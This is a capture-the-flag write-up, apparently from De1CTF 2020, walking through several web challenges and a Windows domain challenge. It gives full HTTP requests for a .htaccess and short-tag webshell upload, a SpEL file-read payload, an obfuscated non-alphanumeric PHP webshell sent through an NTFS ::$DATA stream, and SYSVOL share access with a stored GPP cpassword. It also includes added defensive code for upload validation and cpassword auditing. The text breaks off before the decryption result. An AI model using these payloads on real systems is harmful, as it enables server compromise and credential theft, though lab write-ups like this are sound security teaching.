The challenges were high quality; although they were hard, I learned a lot!

First try uploading a file with the .php suffix; as expected it fails. So try uploading a .jpg image instead; the result is:

perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet in contents!

So the file contents are checked against the denylist perl|pyth|ph|auto|curl|base|>|rm|ruby|openssl|war|lua|msf|xter|telnet.

We can upload a .htaccess that makes another suffix be parsed as a .php file, e.g. AddType application/x-httpd-php shell.ppt. However, because the string php is filtered, the uploaded file cannot contain php, so the php in the uploaded .htaccess can be broken up with a line continuation (backslash followed by a newline). For the uploaded shell.ppt, if short tags are enabled in this PHP we can use the short tag <?= instead of <?php. Let's try it:
,下面咱们就来尝试一下:POST /index.php HTTP/1.1 Host: 129.204.21.115 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------279095805311502314111982965121 Content-Length: 384 Origin: http://129.204.21.115 Connection: close Referer: http://129.204.21.115/index.php Upgrade-Insecure-Requests: 1 -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="fileUpload"; filename=".htaccess" Content-Type: image/jpeg AddType application/x-httpd-p\ hp .ppt -----------------------------279095805311502314111982965121 Content-Disposition: form-data; name="upload" submit -----------------------------279095805311502314111982965121--
HTTP/1.1 200 OK
Date: Mon, 04 May 2020 08:45:52 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1027
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cheek in</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="style/css/style1.css">
<link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<body>
<div class="wrap">
<div class="container">
<h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
<form action="index.php" method="post" enctype="multipart/form-data">
<input class="wd" type="file" name="fileUpload" id="file"><br>
<input class="wd" type="submit" name="upload" value="submit">
<p class="change_link" style="text-align: center">
<strong></strong>
</br>
<strong>Your files :.htaccess<br></strong>
</br>
<strong>Your dir : uploads/001149b089f853aad2bda9214b94fb21 <br></strong>
</p>
</form>
</div>
</div>
</body>
</html>
Then upload shell.ppt:

POST /index.php HTTP/1.1
Host: 129.204.21.115
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------279095805311502314111982965121
Content-Length: 376
Origin: http://129.204.21.115
Connection: close
Referer: http://129.204.21.115/index.php
Upgrade-Insecure-Requests: 1

-----------------------------279095805311502314111982965121
Content-Disposition: form-data; name="fileUpload"; filename="shell.ppt"
Content-Type: image/jpeg

GIF89a
<?=system('cat /flag');
-----------------------------279095805311502314111982965121
Content-Disposition: form-data; name="upload"

submit
-----------------------------279095805311502314111982965121--
HTTP/1.1 200 OK
Date: Mon, 04 May 2020 08:46:10 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Content-Length: 1027
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Cheek in</title>
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" type="text/css" href="style/css/style1.css">
<link rel="stylesheet" type="text/css" href="style/css/style2.css">
</head>
<body>
<div class="wrap">
<div class="container">
<h1 style="color: white; margin: 0; text-align: center">UPLOADS</h1>
<form action="index.php" method="post" enctype="multipart/form-data">
<input class="wd" type="file" name="fileUpload" id="file"><br>
<input class="wd" type="submit" name="upload" value="submit">
<p class="change_link" style="text-align: center">
<strong></strong>
</br>
<strong>Your files :shell.ppt<br></strong>
</br>
<strong>Your dir : uploads/001149b089f853aad2bda9214b94fb21 <br></strong>
</p>
</form>
</div>
</div>
</body>
</html>
Visiting http://129.204.21.115/uploads/001149b089f853aad2bda9214b94fb21/shell.ppt returns the flag:

De1ctf{cG1_cG1_cg1_857_857_cgll111ll11lll}
Bypassing blacklist checks to upload files: http://hetianlab.com/expc.do?ec=ECIDc089-d935-4f8d-b0bd-d2342ea4423f (this lab covers why file-upload vulnerabilities arise and how to exploit them by bypassing a blacklist)
This is a web project built on the Spring Boot framework. GET /spel/calc?calc=%7b%7b7*7%7d%7d returns [[49]], so there is an injection. Testing shows that Runtime, java.lang, getClass, T(, new and so on are filtered. We can replace new with neW, but because the other strings are filtered we can no longer get RCE; we can, however, read files another way, using java.util.Scanner. The payload is:

neW Scanner(neW java.io.FileInputStream(neW java.io.File("/flag"))).nextLine()
Spring Boot unauthorized access: http://hetianlab.com/expc.do?ec=ECID07d9-3ccd-4c90-8a09-b980d8cd7858 (this lab covers why the vulnerability arises and the basics of exploiting and using it)
<?php
//Clear the uploads directory every hour
highlight_file(__FILE__);
$sandbox = "uploads/". md5("De1CTF2020".$_SERVER['REMOTE_ADDR']);
@mkdir($sandbox);
@chdir($sandbox);
if($_POST["submit"]){
    if (($_FILES["file"]["size"] < 2048) && Check()){
        if ($_FILES["file"]["error"] > 0){
            die($_FILES["file"]["error"]);
        }
        else{
            $filename=md5($_SERVER['REMOTE_ADDR'])."_".$_FILES["file"]["name"];
            move_uploaded_file($_FILES["file"]["tmp_name"], $filename);
            echo "save in:" . $sandbox."/" . $filename;
        }
    }
    else{
        echo "Not Allow!";
    }
}

function Check(){
    $BlackExts = array("php");
    $ext = explode(".", $_FILES["file"]["name"]);
    $exts = trim(end($ext));
    $file_content = file_get_contents($_FILES["file"]["tmp_name"]);
    if(!preg_match('/[a-z0-9;~^`&|]/is',$file_content) &&
       !in_array($exts, $BlackExts) &&
       !preg_match('/\.\./',$_FILES["file"]["name"])) {
        return true;
    }
    return false;
}
?>
<html>
<head>
    <meta charset="utf-8">
    <title>upload</title>
</head>
<body>
    <form action="index.php" method="post" enctype="multipart/form-data">
        <input type="file" name="file" id="file"><br>
        <input type="submit" name="submit" value="submit">
    </form>
</body>
</html>
Because of the filtering in Check() we cannot use ordinary characters, and we cannot upload a file with the .php suffix. However, since the server is Windows, we can bypass the suffix restriction with an NTFS stream, ::$DATA, for example with the file name test.php::$DATA and the following contents:
<?=$_=[]?> <?=$_=@"$_"?> <?= $_=$_['!'=='@']?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___=$__?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__++?> <?=$___.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$___.=$__?> <?=$____='_'?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?= $____.=$__?> <?=$__=$_?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$__++?> <?=$____.=$__?> <?=$_=$$____?> <?=$___($_[_])?>
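As an added example (not code from the challenges or this writeup), here is a hardened upload check, in Python for illustration, that closes the gaps used in both upload challenges above: the .htaccess whose php is split by a line continuation, the short-tag payload behind a fake image header, and the ::$DATA suffix. The function names, the allowlist and the sample uploads are my own constructions.

```python
import re
import secrets
# Added example, not the challenge code: a hardened version of the upload
# checks bypassed on this page. Allowlisted extensions map to the magic
# bytes the uploaded body must start with.
ALLOWED = {"jpg": b"\xff\xd8\xff", "png": b"\x89PNG\r\n\x1a\n", "gif": b"GIF8"}

def normalize(data):
    # Join Apache backslash-newline continuations and lowercase, so the
    # uploaded "x-httpd-p\<newline>hp" is inspected as "x-httpd-php".
    return re.sub(rb"\\\r?\n", b"", data).lower()

def validate_upload(filename, content):
    """Return (accepted, reason); reason names the first failing check."""
    # Dotfiles (.htaccess), path separators, "..", NUL and NTFS alternate
    # data streams ("test.php::$DATA") are rejected by name.
    if not filename or filename.startswith(".") or re.search(r"[/\\\x00]|\.\.|::", filename):
        return False, "bad filename"
    # Only the last dot-separated part counts, and it must be allowlisted.
    parts = filename.lower().rsplit(".", 1)
    if len(parts) != 2 or parts[1] not in ALLOWED:
        return False, "extension not allowed"
    # The body must start with the magic bytes of the claimed image type.
    if not content.startswith(ALLOWED[parts[1]]):
        return False, "content does not match extension"
    # Defence in depth: no PHP open tag (the short tag <?= included) and no
    # "php" even when split across a line continuation.
    body = normalize(content)
    if b"<?" in body or b"php" in body:
        return False, "script marker in content"
    return True, "ok"

def storage_name(filename):
    # Never keep the client's name: a random name plus the verified extension
    # means neither .htaccess nor a .php suffix can ever reach the disk.
    return f"{secrets.token_hex(16)}.{filename.lower().rsplit('.', 1)[1]}"

# Constructed inputs mirroring the uploads shown in this writeup.
CASES = [
    (".htaccess", b"AddType application/x-httpd-p\\\nhp .ppt"),
    ("shell.ppt", b"GIF89a\r\n<?=system('cat /flag');"),
    ("shell.gif", b"GIF89a\r\n<?=system('cat /flag');"),
    ("test.php::$DATA", b"<?=$_=[]?>"),
    ("photo.jpg", b"\xff\xd8\xff\xe0" + bytes(16)),
]

if __name__ == "__main__":
    for name, data in CASES:
        print(name, validate_upload(name, data))
```

Together with serving the upload directory with script execution disabled, the random storage name is the control that makes the .htaccess trick moot regardless of what the content filter misses.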
flag1_and_flag2hint is inside a zip archive, but we do not have the password and brute-forcing it fails, so we turn to Windows pentesting. net time /domain gives the result dc.De1CTF2020.lab. The ipconfig command shows the domain controller: 192.168.0.12.

net use \\192.168.0.12
net view \\192.168.0.12
net use S: \\192.168.0.12\wq

After pressing Enter, the target machine's share is mapped as drive S:. Or just run net use \\192.168.0.12\SYSVOL\de1ctf2020.lab\Policies directly, whichever you prefer.
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="HintZip_Pass" image="2" changed="2020-04-15 14:43:23" uid="{D33537C1-0BDB-44B7-8628-A6030A298430}">
    <Properties action="U" newName="" fullName="" description="" cpassword="uYgjj9DCKSxqUp7gZfYzo0F6hOyiYh4VmYBXRAUp+08" changeLogon="1" noChange="0" neverExpires="0" acctDisabled="0" userName="HintZip_Pass"/>
  </User>
</Groups>
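A defender-side audit for the weakness used here, written as an added example (not part of the writeup): it reports every Group Policy Preferences element that still stores a cpassword, either from one XML document or by walking a SYSVOL Policies tree. The names PREF_FILES, find_cpasswords and scan_sysvol are my own, and the sample XML is constructed with a placeholder cpassword.

```python
import os
import xml.etree.ElementTree as ET
# Added example, not part of the writeup: audit Group Policy Preferences
# files for stored cpassword values (the weakness used above). These six
# GPP item types are the ones that can carry a cpassword attribute.
PREF_FILES = {"Groups.xml", "Services.xml", "ScheduledTasks.xml",
              "DataSources.xml", "Drives.xml", "Printers.xml"}

def find_cpasswords(xml_data, source="<string>"):
    """Return one finding per element whose cpassword attribute is non-empty."""
    findings = []
    try:
        root = ET.fromstring(xml_data)
    except ET.ParseError:
        return findings                       # not well-formed: nothing to report
    for parent in root.iter():                # <User>, <Service>, <Task>, ...
        for child in parent:                  # their <Properties> element
            cpw = child.get("cpassword")
            if not cpw:                       # absent or "" means no stored secret
                continue
            findings.append({
                "file": source,
                "item": parent.get("name", parent.tag),
                "account": child.get("userName") or child.get("accountName")
                           or child.get("runAs") or "",
                "changed": parent.get("changed", ""),
                "cpassword_len": len(cpw),    # report the length, never the value
            })
    return findings

def scan_sysvol(policies_dir):
    # Walk a SYSVOL Policies tree and collect findings from every GPP file.
    results = []
    for dirpath, _dirs, files in os.walk(policies_dir):
        for name in files:
            if name in PREF_FILES:
                path = os.path.join(dirpath, name)
                with open(path, "rb") as fh:
                    results.extend(find_cpasswords(fh.read(), path))
    return results

# Constructed sample shaped like the Groups.xml above; the cpassword is a placeholder.
SAMPLE = b"""<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User name="HintZip_Pass" changed="2020-04-15 14:43:23">
    <Properties action="U" cpassword="PLACEHOLDER_cpassword_value" userName="HintZip_Pass"/>
  </User>
</Groups>"""
```

Any finding means the policy should be edited to remove the stored credential and the account's password rotated, since anyone who can read SYSVOL can recover it exactly as this writeup does.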
Decrypting the cpassword with gpp-decrypt gives the following result: